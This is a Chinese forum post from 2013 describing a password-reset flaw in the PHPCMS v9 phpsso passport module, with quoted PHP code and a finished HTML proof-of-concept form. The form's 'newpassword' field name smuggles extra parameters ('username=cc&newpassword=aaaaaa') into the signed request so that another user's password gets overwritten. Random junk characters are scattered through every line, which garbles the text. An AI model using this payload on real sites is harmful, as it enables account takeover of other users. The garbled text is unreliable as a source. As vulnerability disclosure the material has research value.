提到的通行证的代码:
/ T+ l M- O2 _ {% z: [
* [7 d; [/ j+ `" \, @& h9 R9 `5 \! j' d4 L7 S7 |6 _4 S' L
parse_str(sys_auth($_POST['data'], 'DECODE', $this->applist[$this->appid]['authkey']), $this->data);
0 s7 C7 r* a0 u8 m
+ X! a" r& S2 L. u8 s( K在phpsso_server/phpcms/modules/phpsso/classes/phpsso.class.php中。
% P$ n6 E3 ]. u! l- h, M0 M: J. Y. i6 S
我把它留给了你们。
, U A {2 Y) f I+ g/ O! ^/ I不知道你们发现了它没有。, O& K$ x4 a7 B5 |% @# e- s! b
) d* O0 B8 x! Z/ _& w" H9 z7 c我们知道parse_str类似将http请求转换成php变量的函数,所以,也像http请求在php的环境下一样,如果提交?a=sss&a=aaa,那么a的结果会是aaa,不是sss。/ J4 ? H2 U" f' I8 n
. s8 Y) q: ]! Z) m' l- T
所以我们知道这个函数有一个问题了,如果后面提交一个内容,它会覆盖前面的。
8 `5 c5 k/ ?0 U
2 Y: ]$ y" j$ ?9 q- N0 l& G也就是: w7 X# y+ q. k' X% \- l2 y& ]
7 O& V5 N6 F$ N+ E3 h4 F, [7 `
username=zhangsan&username=lisi的话,那么用户名就不是zhangsan了。, H7 S8 Q1 t5 r: R4 o/ q1 G
& D$ c e- K8 C, g2 f
要构造这样的请求,我们还是要回到通行证的client看看,我们有没有这样的机会。
/ O: R7 S |; O6 ]* L/ ?# N4 ]" m% w' ?
6 v1 ]8 Z' n: a O
其实我们有这样的机会,看看代码,如下:
) { c6 c( U9 d8 F2 c' c% [$ ^# O9 K) ?/ q& s5 z6 P9 B
+ l) A! K$ [9 R; ?; cpublic function auth_data($data) {9 Y, N+ u; L- V! e a$ R7 x9 w
$s = $sep = '';
3 ?, n/ U4 t# }5 ^" c foreach($data as $k => $v) { w( L! g) ^6 f3 Q
if(is_array($v)) {& ~- i' w( W8 w2 c1 h2 X9 P) H
$s2 = $sep2 = '';$ R. O5 i* k& x1 R: w
foreach($v as $k2 => $v2) {
( K$ E; z) W/ \$ q0 M $s2 .= "$sep2{$k}[$k2]=".$this->_ps_stripslashes($v2);
6 D# Q( D6 |; s $sep2 = '&';
" f ?! X9 |* B* o5 o( w }( m& h6 z* P. v
$s .= $sep.$s2;5 @ \2 g0 ~8 E/ K2 P$ {: I
} else {0 s0 n, a; ^ [" w: R7 e9 J
$s .= "$sep$k=".$this->_ps_stripslashes($v);
. T8 x2 K$ @8 `$ P$ e1 ~ }- y5 W8 e& L- ^1 u
$sep = '&';) b4 c) z* k2 q
}( V! B* l9 O" W2 @3 W. w5 I
7 S. f& u) z2 J3 D/ G# Z
$auth_s = 'v='.$this->ps_vsersion.'&appid='.APPID.'&data='.urlencode($this->sys_auth($s));; |$ M0 }) w O. P O# B6 R- Q# v1 ^
return $auth_s;7 ]! y5 b( N/ ]& E2 Z
}
% J; x( Y, R! a# g* ^" |+ J! H: S8 D6 q4 U1 Q G
可能我没说明白,对,传递进来的数组的key是可控的。如果我的key里包含[]&这样三个字符的话,那么我就能重写这样的东西。
% v! s' q5 b3 A" I8 n2 V2 \
$ u5 I* F9 N# T! M7 @3 E, \举个例子
% E( y/ Q) o4 a& C/ Z0 L, w6 A: @6 J, c2 `2 Y- ?, ?* b$ |
$a[aaa=a&bbb] = 'a';
. z" ]/ e8 i( y5 p/ N' N9 a6 F' y# P6 o1 I X( ]
会变成aaa=a&bbb=a; d4 H: b5 A& F
+ h$ ~' j( h7 Z' J( T& M4 k" U5 ?5 V明白了么,对,就是通过没有注意到的key,我们可以构造出多余的参数来。# |% a0 M' B! l, G8 n- C% d: U
4 m* s% h+ j8 E9 ] M这个时候,我们可以再去看一个函数。3 V! { H$ j. b5 g
$ r; t; u3 `. g* D( F0 T就在这个文件内:6 |! K. d% U* Y6 ]
' D% p8 e7 ^" c* Z) Q
* w" U" a# Q7 G* M* L. x/ Z0 [# a0 lpublic function ps_member_edit($username, $email, $password='', $newpassword='', $uid='', $random='') {& A/ U7 ?+ z. S7 T) D0 p
if($email && !$this->_is_email($email)) {
% B& j U1 S. T( q$ O return -4;
! S/ N: M# Y7 O! L* M: g* q$ x }- p3 B7 h# s. V6 U- d- S
return $this->_ps_send('edit', array('username'=>$username, 'password'=>$password, 'newpassword'=>$newpassword, 'email'=>$email, 'uid'=>$uid, 'random'=>$random));; u2 |/ w9 x/ U! }$ _1 [. @; Y
}
- V' y$ {3 ? _9 H" @1 ^: x; d8 B! B( a) z# T' p( F
这是向通行证发了这样一个请求。& m$ |5 z) P) y% k! r
3 D2 B& e& x q" Y0 J. q4 ^3 w7 G我们再跟到通信证代码里去看看,就会有所发现。: }$ D8 q) N3 D8 A( w
* A% y9 O) f8 \7 s
# V1 R! t% M ~; `0 zpublic function edit() {$ w6 F; [! t: v) t! W
//能省就省,太长了不是吗?
# u% s3 h! d/ ~0 j) P7 {# B! w- x, ?: k& U
if($this->username) {
; g7 M, m: R2 t4 I6 J8 E4 U//如果提交了用户名,则按照用户名修改记录,反之,按照uid来修改记录。" c, k, Z) C: J
$res = $this->db->update($data, array('username'=>$this->username));
0 [* R3 X2 D3 R: p) E0 e) C } else {
/ o; f& { y7 ^ file_put_contents('typeb.txt',print_r($data,1).$this->uid);
6 m9 X/ q/ M' N- A8 L $res = $this->db->update($data, array('uid'=>$this->uid));$ `% i4 c( T8 G' [
}
5 D# r1 \: w! D; a# t5 }" V. o
$ \& h b. g; [3 s/ w好,我们知道了,如果提交了用户名,就会按照用户名来修改记录,不然就按照uid,我们看看函数结构:
2 |0 w3 U, t2 N9 \" k* H: n2 c6 s5 g" [! O; z- s& T
public function ps_member_edit($username, $email, $password='', $newpassword='', $uid='', $random='')
: N6 P0 }4 {* p0 I
; g6 P" U1 k4 U$ R2 S. B( Z+ A# W很好,uid要是无法控制的话,后面只剩下一个random了,但是username就在第一个,只要email,password,newpassword,有任何一个可以控制,就可以修改密码了。2 W/ J& D& s, ?+ _& L; W
! f" M4 Q# X) ]( i# a! S我当然找到了: }& s! R! P0 H0 \/ D* L2 E
phpcms9/phpcms/modules/member/index.php
- h F0 d4 O( [8 q3 b, Y) h% S( U8 d- f. X* H
$res = $this->client->ps_member_edit('', $email, $_POST['info']['password'], $_POST['info']['newpassword'], $this->memberinfo['phpssouid'], $this->memberinfo['encrypt']);
0 ~6 u0 @4 r) }9 {6 y
; }; q# ?" e. K1 p2 {. ?) `' B然后就没有然后了。6 v/ c* [& }8 V
/ @2 _* {, a" N z<form method="post" action="http://localhost/phpcms9/index.php?m=member&c=index&a=account_manage_password&t=1" id="myform" name="myform">
8 v* C3 _* u$ D2 n: L6 n7 I <table width="100%" cellspacing="0" class="table_form">
' ^ ^ ?9 F6 I4 V$ d" Z( n <tr>
" J3 o Q! e$ j, R/ c9 k/ l7 _8 T <th width="80">邮箱:</th> 0 r* F! V b1 {' Z$ W0 z
<td><input name="info[email]" type="text" id="email" size="30" value="jj@jj.com" class="input-text"></td>( K, L4 w7 c7 P) i# h/ a$ x" y8 m
</tr>; p1 s. s3 ?& [6 x* q; q/ C; w
<tr>8 F2 V9 r' |" l G4 B. ^- S! g
<th width="80">原密码:</th> : ?* m$ m9 t' Q
<td><input name="info[password]" type="password" id="password" size="30" value="111111" class="input-text"></td>. |: ^; Q3 e; T8 l( _/ ] E# t4 O
</tr>
+ y! F0 E9 G" U6 x. i6 ~ <tr>
7 T! l, `: p- Z4 a4 A5 h <th>新密码:</th>
7 g2 b' I' |4 a3 o <td><input name="info[newpassword][%5D=aaa%5D%5B&username=cc&newpassword=aaaaaa&]" type="password" id="newpassword" size="30" value="" class="input-text"></td>
7 C. l/ ?, J0 b8 `# K* t+ v </tr>4 u( n( h4 z. E3 P( ?1 j7 B
<th></th>* ?: c# R7 O' C2 o3 U
<td><input name="dosubmit" type="submit" id="dosubmit" value="提交" class="button"></td>
$ ]( U2 q% h0 k$ B! J- P% U </tr>
/ X4 J. U2 ]! S0 S </table>
7 M- t9 a7 g: @! }6 ~/ G, N/ J7 P0 l. h: f
9 A9 X5 \! @! I) t' T </form>
' C7 V7 D, J: s& x# z$ D |
发表于 2013-2-23 14:46:35
收藏
支持
反对